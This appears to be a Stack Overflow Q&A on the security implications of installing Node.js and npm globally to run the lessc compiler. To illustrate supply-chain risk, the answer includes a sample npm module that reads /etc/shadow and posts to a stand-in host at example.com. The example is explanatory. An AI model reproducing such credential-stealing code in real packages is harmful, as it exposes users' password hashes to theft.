4

Here's why I'm asking:

In order to use the lessc compiler under windows, I had to install Node.js and NPM based on this guide: http://lesscss.org/#getting-started

So basically, I just:

  1. Downloaded and installed Node.js from http://nodejs.org/
  2. Ran and installed lessc using npm install -g less

Detailed question:

Are there any security implications I should be aware of? Does Node.js open any ports? Does it run in the background? Does it auto-update?

Mario Awad
  • 1,410
  • 17
  • 32
  • 1
    For all three questions the answer is "No". `Node` is just an "execution environment" for the scripts it does nothing on its own. – seven-phases-max Nov 14 '14 at 11:14
  • Can you elaborate? What about NPM? Any resources to read more about the subject? Thanks. – Mario Awad Nov 14 '14 at 11:18
  • 1
    I suppose reading some tutorials on using `node`/`npm` should enlighten the key principles. In short, neither `node` nor `npm` run in the background, they also do not run/install any hidden services/drivers or any stuff of that kind at all. Everything they do is explicitly controlled by you when you run/launch corresponding script/command/batch-file. (So it's just the same as with any other environment in general - it's all safe until you explicitly install/execute some `virii` tool/script). – seven-phases-max Nov 14 '14 at 11:28

1 Answers1

3

Are there any security implications I should be aware of?

Yes, of course as already pointed out by @seven-phases-max in the comments, the risk will be that you run a script that is insecure or does anything that you do not want.

In the above you use the -g (global) flag when installing less, which means that you install less as superuser (administrator) on your system. As already explained here by @Explosion_Pills: "An installation can run arbitrary scripts and running it with sudo can be extremely dangerous!"

AFAIK everyone can publish a node module on npm, so i can publish a module and you install it, which for instance contains:

var request = require('request'),
fs = require('fs');

fs.readFile('/etc/shadow', 'utf8', function (err,data) {
  if (err) {
    return console.log(err);
  }

  request.post(
    'http://www.example.com/passwords',
    { form: { key: 'value' } },
    function (error, response, body) {
      if (!error && response.statusCode == 200) {
        console.log(body);
      }
    }
  );
});

Also take a look at Node Security Project.

Bass Jobsen
  • 48,736
  • 16
  • 143
  • 224